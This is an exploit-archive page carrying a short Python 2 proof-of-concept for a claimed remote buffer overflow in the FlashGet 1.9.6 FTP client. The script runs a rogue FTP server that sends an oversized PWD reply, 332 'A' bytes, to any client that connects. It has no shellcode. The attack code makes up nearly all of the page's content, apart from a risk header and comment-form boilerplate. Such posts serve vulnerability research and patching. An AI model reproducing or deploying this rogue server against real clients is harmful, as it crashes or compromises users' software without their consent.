FlashGet 1.9.6 0day Remote Buffer Overflow

2020.05.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: FlashGet 1.9.6 0day Remote Buffer Overflow # Date: 2020.05.02 # Author: Milad Karimi # Testen on: Kali Linux # Software Link: http://www.flashget.com/en/download.htm?uid=undefined # Version: 1.9.6 # CVE : N/A from time import sleep from socket import * res = [ '220 WELCOME!! :x\r\n', '331 Password required for %s.\r\n', '230 User %s logged in.\r\n', '250 CWD command successful.\r\n', '257 "%s/" is current directory.\r\n' # <-- %s B0f :x ] buf = 'A' * 332 s = socket(AF_INET, SOCK_STREAM) s.bind(('0.0.0.0', 21)) s.listen(1) print '[+] listening on [FTP] 21 ...\n' c, addr = s.accept() c.send(res[0]) user = '' for i in range(1, len(res)): req = c.recv(1024) print '[*][CLIENT] %s' % (req) tmp = res[i] if(req.find('USER') != -1): req = req.replace('\r\n', '') user = req.split('\x20', 1)[1] tmp %= user if(req.find('PASS') != -1): tmp %= user if(req.find('PWD') != -1): tmp %= buf print '[*][SERVER] %s' % (tmp) c.send(tmp) sleep(5) c.close() s.close() print '[+] DONE' # Discovered By : Milad Karimi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top